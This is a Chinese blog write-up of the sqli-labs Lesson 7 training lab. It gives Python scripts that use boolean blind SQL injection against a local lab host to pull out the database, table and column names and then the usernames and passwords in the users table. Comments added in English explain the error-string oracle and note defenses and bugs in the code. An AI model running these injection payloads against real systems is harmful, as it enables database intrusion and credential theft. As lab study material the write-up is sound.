sqli-labs-lesson7

作者: 疯帮主 | 来源:发表于2018-12-01 09:11 被阅读0次

    这个是盲注,也是报错注入,有点绕
    先看看流程吧


    图片.png

    都是成双的,
    第一句:判断有没注入
    第二句:判断当前表有几个字段
    第三句:判断数据库名长度
    第四句:猜数据库名
    第五句:判断语句有没正常执行
    第六句:也是判断数据库名长度
    第七句:判断有几个表
    第八句:判断每个表长度
    第九句:猜表名
    第十句:判断有几个字段
    第十一句:判断每个字段的 长度
    第十二句:猜字段名
    第十三句:有几条数据
    第十四句:每个数据长度
    第十五句:猜数据

    脚本

    当然不可能使用手动咯,

    # Step 1: length of the current database name.
    # Oracle used by every step on this page: the lab page contains
    # "You have an error in your SQL syntax" exactly when the injected
    # comparison is false (presumably because the query then returns no
    # row), so the script records the first `_` at which
    # `char_length(database()) > _` stops holding, i.e. the length itself.
    # Defender's view: the oracle exists only because `id` is interpolated
    # into the SQL and the raw database outcome is echoed to the client;
    # binding `id` as a query parameter and returning a generic error page
    # removes it, and the long run of near-identical GETs with a varying
    # `and ...` tail is what request logs / a WAF would surface.
    # NOTE(review): `requests` is used here but never imported anywhere on
    # this page; `import string` only appears in the next step.
    database_length = 0
    for _ in range(0,10):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length(database())>{} -- ".format(_)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            # runtime message kept verbatim ("Databse" typo included)
            print("[+] Databse length is <{}>".format(_))
            database_length = _
            break
        else:
            print("[-] {}".format(_))
    
    图片.png
    # Step 2: recover the database name one position at a time.
    # For position `_`, the first letter for which `substr(...) > letter`
    # stops holding is taken as the character at that position.  Only
    # `string.ascii_lowercase` is tried; `database_length` comes from the
    # previous step.
    import string
    database_name = ""
    for _ in range(1, database_length+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr(database(),{},1)>'{}' -- ".format(_, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] find name is [{}]<{}>".format(_,char))
                database_name += char
                break
            else:
                print("[-] {}".format(char))
    
    print(database_name)
    
    图片.png
    # Step 3: count the tables in the schema.
    # `limit _,1` walks the table list; the first offset whose name has
    # length 0 (i.e. no row) is taken as the table count.
    # NOTE(review): the schema is hard-coded as 'security' here, whereas
    # the following steps use `database_name` — the two disagree if the
    # guess in step 2 was wrong.
    tables_count = 0
    for _ in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='security' limit {},1))>0 -- ".format(_)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] table count is <{}>".format(_))
            tables_count = _
            break
        else:
            print("[-] {}".format(_))
    
    图片.png
    # Step 4: length of each table name, indexed by table offset `_`.
    # Same error-string check as the earlier steps; `tables_length[_]`
    # is the first `i` at which `char_length(name) > i` stops holding.
    # NOTE(review): if no `i` below 100 triggers the break, nothing is
    # appended and the list silently falls out of step with `tables_count`.
    tables_length = []
    for _ in range(0,tables_count):
        for i in range(0, 100):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='{}' limit {},1))>{} -- ".format(database_name,_, i)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}]table length is <{}>".format(_,i))
                tables_length.append(i)
                break
            else:
                print("[-] [{}]{}".format(_,i))
    
    图片.png
    # Step 5: recover each table name character by character.
    # Outer loop: table offset `_`; middle loop: position `i` (1-based,
    # bounded by `tables_length[_]`); inner loop: lowercase letters only.
    tables_name = []
    for _ in range(0, tables_count):
        table_name = ""
        for i in range(1, tables_length[_]+1):
            for char in string.ascii_lowercase:
                url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1), {},1)>'{}' -- ".format(database_name,_,i, char)
                response = requests.get(url)
                if "You have an error in your SQL syntax" in response.text:
                    print("[+] [{}][{}]table name is <{}>".format(_,i, char))
                    table_name += char
                    break
                else:
                    print("[-] [{}][{}]{}".format(_,i, char))
        tables_name.append(table_name)
    
    图片.png
    # Step 6: count the columns of the `users` table.
    # NOTE(review): `tables_name[3]` assumes the table of interest is the
    # fourth one listed; the index is never checked against
    # `tables_count`, so fewer than four tables raises IndexError here.
    # The `table_name=` filter is also not qualified by schema.
    columns_count = 0
    for _ in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>0 -- ".format(tables_name[3], _)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] column count is <{}>".format(_))
            columns_count = _
            break
        else:
            print("[-] {}".format(_))
    
    图片.png
    # Step 7: length of each column name of `tables_name[3]`.
    # Mirrors the table-name-length step: `columns_length[_]` is the first
    # `i` at which `char_length(column_name) > i` stops holding.
    columns_length = []
    for _ in range(0,columns_count):
        for i in range(0, 100):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>{} -- ".format(tables_name[3],_, i)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}]column length is <{}>".format(_,i))
                columns_length.append(i)
                break
            else:
                print("[-] [{}]{}".format(_,i))
    
    图片.png
    # Step 8: recover each column name of `tables_name[3]`.
    # Same shape as the table-name step (offset / 1-based position /
    # lowercase letters); each finished name is printed and collected.
    columns_name = []
    for _ in range(0, columns_count):
        column_name = ""
        for i in range(1, columns_length[_]+1):
            for char in string.ascii_lowercase:
                url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select column_name from information_schema.columns where table_name='{}' limit {},1), {},1)>'{}' -- ".format(tables_name[3],_,i, char)
                response = requests.get(url)
                if "You have an error in your SQL syntax" in response.text:
                    print("[+] [{}][{}]column name is <{}>".format(_,i, char))
                    column_name += char
                    break
                else:
                    print("[-] [{}][{}]{}".format(_,i, char))
        print(column_name)
        columns_name.append(column_name)
    
    图片.png
    # Step 9: number of rows in `users`.
    # `row` is the first `_` at which `count(id) > _` stops holding.
    # NOTE(review): the table is now hard-coded as `users` instead of
    # `tables_name[3]`, and the success message says "row name" although
    # the value is a row count (message kept verbatim — it is runtime text).
    row = 0
    for _ in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and (select count(id) from users)>{} -- ".format(_)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] row name is <{}>".format(_))
            row = _
            break
        else:
            print("[-] {}".format(_))
    
    图片.png
    # Step 10: per-row length of `username` and `password`.
    # Each entry of `username_password_length` is `[username_len, password_len]`.
    # Unlike the earlier steps this one compares with `>=`, so the loop
    # breaks one past the length and `ui-1` / `pi-1` is recorded.
    username_password_length = []
    for _ in range(0, row):
        up = []
        # username length
        for ui in range(1,100):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select username from users limit {},1))>={} -- ".format(_,ui)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] username length is <{}>".format(_,ui-1))
                up.append(ui-1)
                break
            else:
                print("[-] [{}] {}".format(_,ui-1))
        # password length
        for pi in range(1,100):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select password from users limit {},1))>={} -- ".format(_,pi)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] password length is <{}>".format(_,pi-1))
                up.append(pi-1)
                break
            else:
                print("[-] [{}] {}".format(_,pi-1))
        username_password_length.append(up)
    # NOTE(review): the bare name below is an expression statement with no
    # effect in a script (presumably left over from an interactive session).
    username_password_length
    
    图片.png
    # Step 11: recover the row contents.
    # Positions `ui` / `pi` are 0-based here and passed to substr as
    # `ui+1` / `pi+1`.  The probe compares `ascii(char) >= inti` over the
    # printable range 33..127, so the first `inti` that fails is one past
    # the character code and `chr(inti-1)` is appended.
    # NOTE(review): `data` collects `[username, password]` pairs but is
    # never used afterwards on this page.
    data = []
    for _ in range(row):
        username = ""
        for ui in range(username_password_length[_][0]):
            for inti in range(33,128):
                url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select username from users limit {},1),{},1))>={}) -- ".format(_,ui+1,inti)
                response = requests.get(url)
                if "You have an error in your SQL syntax" in response.text:
                    print("[+] [{}] username[{}]  is <{}>".format(_+1,ui+1, chr(inti-1)))
                    username += chr(inti-1)
                    break
                else:
                    print("[-] [{}][{}] {}".format(_+1,ui+1, chr(inti)))
        print(username)
        password = ""
        for pi in range(username_password_length[_][1]):
            for inti in range(33,128):
                url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select password from users limit {},1),{},1))>={}) -- ".format(_,pi+1,inti)
                response = requests.get(url)
                if "You have an error in your SQL syntax" in response.text:
                    print("[+] [{}] password[{}]  is <{}>".format(_+1,pi+1, chr(inti-1)))
                    password += chr(inti-1)
                    break
                else:
                    print("[-] [{}][{}] {}".format(_+1,pi+1, chr(inti)))
        print(password)
        data.append([username, password])
    
    图片.png

    算是完了,

    可以优化,使用二分法,速度更快
